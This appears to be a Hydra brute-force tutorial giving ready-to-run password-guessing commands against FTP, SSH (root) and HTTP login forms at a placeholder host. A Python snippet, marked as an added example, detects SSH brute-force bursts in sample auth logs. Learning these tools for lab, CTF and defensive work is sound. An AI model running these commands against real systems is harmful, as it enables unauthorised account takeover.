Hydra Bruteforce Kali Linux Tool – Tutorial 101

What is Hydra?

Installing Hydra

Hydra Commands

hydra -l user -P passlist.txt ftp://MACHINE_IP

hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh

-l    specifies the (SSH) username for login
-P    indicates a list of passwords
-t    sets the number of threads to spawn

hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh 
  • Hydra will use root as the username for ssh
  • It will try the passwords in the passwords.txt file
  • There will be four threads running in parallel as indicated by -t 4
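
From the defender's side, the SSH run above shows up in the sshd auth log as a burst of failed logins for one account from one source address. The following detection sketch is an added example, not part of the original tutorial; the log lines are constructed, and the function name, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (not from a real host); the addresses are
# taken from the documentation ranges 192.0.2.0/24 and 198.51.100.0/24.
SAMPLE_LOG = """\
Mar 10 09:15:01 web01 sshd[2101]: Failed password for root from 192.0.2.50 port 40112 ssh2
Mar 10 09:15:01 web01 sshd[2102]: Failed password for root from 192.0.2.50 port 40114 ssh2
Mar 10 09:15:02 web01 sshd[2103]: Failed password for root from 192.0.2.50 port 40116 ssh2
Mar 10 09:15:02 web01 sshd[2104]: Failed password for root from 192.0.2.50 port 40118 ssh2
Mar 10 09:15:03 web01 sshd[2105]: Failed password for root from 192.0.2.50 port 40120 ssh2
Mar 10 09:15:04 web01 sshd[2106]: Failed password for root from 192.0.2.50 port 40122 ssh2
Mar 10 09:16:30 web01 sshd[2110]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Mar 10 09:16:41 web01 sshd[2110]: Accepted password for alice from 198.51.100.7 port 51000 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2024):
    """Return {(ip, user): peak_failures} for every source that reaches
    `threshold` failed logins for one account inside a sliding window.
    Syslog timestamps carry no year, so `year` is supplied by the caller."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # (ip, user) -> failure times still in the window
    alerts = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts

if __name__ == "__main__":
    for (ip, user), count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {count} failed logins for '{user}' within 60s")
```

A single mistyped password followed by a successful login (alice in the sample) stays below the threshold and raises no alert.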
sudo hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
-l                    the username for (web form) login
-P                    the password list to use
http-post-form        the type of the form is POST
<path>                the login page URL, for example, login.php
<login_credentials>   the username and password used to log in, for example, username=^USER^&password=^PASS^
<invalid_response>    part of the response when the login fails
-V                    verbose output for every attempt

The example below is the best way to understand the Hydra tool.

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V 
  • The login page is only /, i.e., the main IP address
  • username is the form field where the username is entered
  • The specified username(s) will replace ^USER^
  • password is the form field where the password is entered
  • The provided passwords will replace ^PASS^
  • Finally, F=incorrect gives a string (incorrect) that appears in the server reply when the login fails

